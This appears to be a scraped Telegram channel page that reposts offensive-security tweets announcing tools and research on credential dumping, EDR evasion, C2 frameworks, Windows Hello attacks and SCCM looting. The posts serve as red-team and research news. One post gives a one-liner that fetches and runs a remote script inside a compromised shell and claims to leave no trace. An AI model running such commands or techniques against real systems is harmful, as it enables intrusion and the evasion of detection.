Offensive Xwitter
19.4K subscribers
908 photos
48 videos
21 files
2.09K links
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://xn--r1a.website/OffensiveTwitter/546
Download Telegram
😈 [ SpecterOps @SpecterOps ]

Do you like BloodHound & PowerShell? Do you want to automate all things BloodHound?

Check out @SadProcessor's new blog post diving into a new PowerShell module he created, &  instructions on how to get started ‡️

πŸ”— https://posts.specterops.io/bloodhound-operator-dog-whispering-reloaded-156020b7c5e9
πŸ”— https://github.com/SadProcessor/BloodHoundOperator

πŸ₯ [ tweet ]
πŸ”₯3πŸ₯±2
😈 [ Cube0x0 @cube0x0 ]

Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time.

Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and MacOS environments:

πŸ”— https://0xc2.io

The first release was back in late 2023, initially only offered to a small circle of red teamers and soon, the registration will be open for new clients who provide threat simulation services.

All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols.

More details will be available soon.

πŸ₯ [ tweet ]
πŸ‘9πŸ”₯1
😈 [ Nic Losby @ DEFCON @Blurbdust ]

And a small update, generation is over halfway and will actually finish! A release of a torrent should be out before the end of the year!

πŸ₯ [ tweet ][ reply ]

(ΠΏΡ€ΠΎ Ρ‚Π΅ самыС Ρ€Π°Π΄ΡƒΠΆΠ½Ρ‹Π΅ Ρ‚Π°Π±Π»ΠΈΡ†Ρ‹ crack.sh πŸ³οΈβ€πŸŒˆ)
πŸ‘5🀯3
😈 [ Michael Schwarz @misc0110 ]

With the #GhostWrite CPU vulnerability, all isolation boundaries are broken - sandbox/container/VM can't prevent GhostWrite from writing and reading arbitrary physical memory on affected RISC-V CPUs. Deterministic, fast, and reliable - no side channels.

πŸ”— https://ghostwriteattack.com/

πŸ₯ [ tweet ]
😒4
😈 [ Daniel @0x64616e ]

Lol, blocking the loading of EDR drivers with WDAC actually works.

πŸ₯ [ tweet ][ quote ]
😁9πŸ‘5
😈 [ CCob🏴󠁧󠁒󠁷󠁬󠁳󠁿 @_EthicalChaos_ ]

Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week πŸ™ˆ

πŸ”— https://github.com/CCob/Shwmae

πŸ₯ [ tweet ]
πŸ”₯6
😈 [ Orange Tsai 🍊 @orange_8361 ]

Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!

Highlights include:
⚑ Escaping from DocumentRoot to System Root
⚑ Bypassing built-in ACL/Auth with just a '?'
⚑ Turning XSS into RCE with legacy code

πŸ”— https://blog.orange.tw/2024/08/confusion-attacks-en.html

πŸ₯ [ tweet ]
πŸ‘8πŸ₯±6πŸ”₯4πŸ€”1
😈 [ Ricardo Ruiz @RicardoJoseRF ]

Last week I made public TrickDump, a tool to dump lsass using only NTAPIS without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. Check it out here:

πŸ”— https://github.com/ricardojoserf/TrickDump

πŸ₯ [ tweet ]
πŸ”₯9πŸ₯±3
😈 [ OtterHacker @OtterHacker ]

I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!

πŸ”— https://github.com/OtterHacker/Conferences/tree/main/Defcon32

πŸ₯ [ tweet ]
πŸ”₯7πŸ‘2πŸ₯±1
😈 [ Bad Sector Labs @badsectorlabs ]

Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with

We've found credentials, certificates, custom apps, keystores, etc. What will you find?

πŸ”— https://github.com/badsectorlabs/sccm-http-looter

πŸ₯ [ tweet ]
πŸ”₯6
😈 [ klez @KlezVirus ]

[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)

πŸ”— https://github.com/klezVirus/DriverJack
πŸ”— https://github.com/klezVirus/RpcProxyInvoke
πŸ”— https://github.com/klezVirus/koppeling-p

πŸ₯ [ tweet ]
πŸ‘7πŸ”₯2
😈 [ Dirk-jan @_dirkjan ]

At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.

Slides:
πŸ”— https://dirkjanm.io/talks/

PoC:
πŸ”— https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion

πŸ₯ [ tweet ]
πŸ”₯3
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]

RELEASE:
This should be the 1st command you execute on a remote shell 🧨

source <(curl -SsfL https://thc.org/hs)


Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).

LEAVES NO TRACE (memory only).

πŸ”— https://github.com/hackerschoice/hackshell

πŸ₯ [ tweet ]
πŸ‘15πŸ”₯4
Offensive Xwitter
😈 [ Daniel @0x64616e ] Lol, blocking the loading of EDR drivers with WDAC actually works. πŸ₯ [ tweet ][ quote ]
😈 [ Yarden Shafir @yarden_shafir ]

Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.

πŸ₯ [ tweet ][ quote ]
πŸ‘13
😈 [ Dazzy @dazzyddos ]

Wrote a blog post on abusing exclusions to evade AVs/EDR which is stealthy, effective and an often overlooked topic.

πŸ”— https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49

πŸ₯ [ tweet ]
😒4πŸ”₯2
😈 [ Logan Goins @shellph1sh ]

Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)

πŸ”— https://logan-goins.com/2024-07-23-ldap-relay/

πŸ₯ [ tweet ]
πŸ”₯6πŸ₯±4πŸ‘1
😈 [ wei @XiaoWei___ ]

MSRC fixed a RCE bug in TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.

πŸ₯ [ tweet ]
🀯12πŸ”₯3πŸ‘2
😈 [ Synacktiv @Synacktiv ]

In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.

πŸ”— https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial

πŸ₯ [ tweet ]
πŸ₯±6πŸ‘4
😈 [ 𝙁 𝙀 𝙇 𝙄 𝙓 π™ˆ @felixm_pw ]

How many of you are down the bottom? πŸ’€

πŸ₯ [ tweet ]
πŸ‘8😁2πŸ€”2😒2